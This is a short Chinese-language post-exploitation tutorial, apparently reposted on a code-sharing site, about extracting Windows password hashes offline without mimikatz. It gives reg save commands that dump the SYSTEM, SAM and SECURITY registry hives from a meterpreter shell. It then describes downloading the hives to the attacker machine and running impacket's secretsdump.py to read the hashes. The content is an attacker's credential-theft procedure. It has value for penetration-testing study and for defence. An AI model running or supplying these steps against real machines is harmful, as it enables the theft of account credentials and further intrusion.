離線提取目標機hash


0x01 前言

很多環境下,不允許上傳或者使用mimikatz。而針對非域控的單機離線提取hash顯得尤為重要。

meterpreter shell命令切到交互式cmd命令。

 

0x02 過程

 

 

reg save 方式使得需要下載的目標機

Ps:reg save將指定子項、項的注冊表值的副本保存到指定文件中

我們需要導出的hash文件

 

reg save HKLM\SYSTEM sys.hiv
reg save HKLM\SAM sam.hiv
reg save hklm\security security.hiv

meterpreter中使用shell命令來到交互式cmd

 

這樣在c盤下就導出了三個注冊表文件

 

返回meterpreter,使用meterpreter下自帶download功能來將目標機的三個注冊表文件下載到攻擊機

 

 

 

下載好了后我們需要讀取目標的hash

用到的工具是impacketsecretsdump.pyKali默認路徑:

 

/root/impacket/examples/secretsdump.py

 

 

Ps:Impacket是一個Python類庫,用於對SMB1-3或IPv4 / IPv6 上的TCP、UDP、ICMP、IGMP,ARP,IPv4,IPv6,SMB,MSRPC,NTLM,Kerberos,WMI,LDAP等協議進行低級編程訪問。 

 

 

命令如下:

python /root/impacket/examples/secretsdump.py ‐sam sam.hiv ‐security security.hiv ‐system sys.hiv LOCAL

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM